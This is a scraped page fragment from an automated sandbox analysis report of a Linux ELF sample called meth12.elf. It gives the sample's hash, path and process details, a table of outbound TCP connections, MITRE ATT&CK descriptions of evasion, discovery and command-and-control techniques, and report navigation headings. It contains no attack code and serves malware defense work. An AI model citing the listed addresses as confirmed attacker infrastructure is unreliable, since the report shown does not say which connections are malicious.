z	.symtab	0x19c78	4	OBJECT	<unknown>	DEFAULT	18

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 15:53:54.508852005 CET	43928	443	192.168.2.23	91.189.91.42
Jan 14, 2025 15:53:59.884166956 CET	42836	443	192.168.2.23	91.189.91.43
Jan 14, 2025 15:54:01.419987917 CET	42516	80	192.168.2.23	109.202.202.202
Jan 14, 2025 15:54:15.498028994 CET	43928	443	192.168.2.23	91.189.91.42
Jan 14, 2025 15:54:25.736618042 CET	42836	443	192.168.2.23	91.189.91.43
Jan 14, 2025 15:54:31.879765034 CET	42516	80	192.168.2.23	109.202.202.202
Jan 14, 2025 15:54:56.452250004 CET	43928	443	192.168.2.23	91.189.91.42
Jan 14, 2025 15:55:16.929404020 CET	42836	443	192.168.2.23	91.189.91.43

System Behavior

Analysis Process: meth12.elf PID: 6238, Parent PID: 6159

General

Start time (UTC):	14:53:54
Start date (UTC):	14/01/2025
Path:	/tmp/meth12.elf
Arguments:	/tmp/meth12.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report meth12.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Dynamic Tags

Symbols

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: meth12.elf PID: 6238, Parent PID: 6159

General

Chronological Activities

Linux Analysis Report
meth12.elf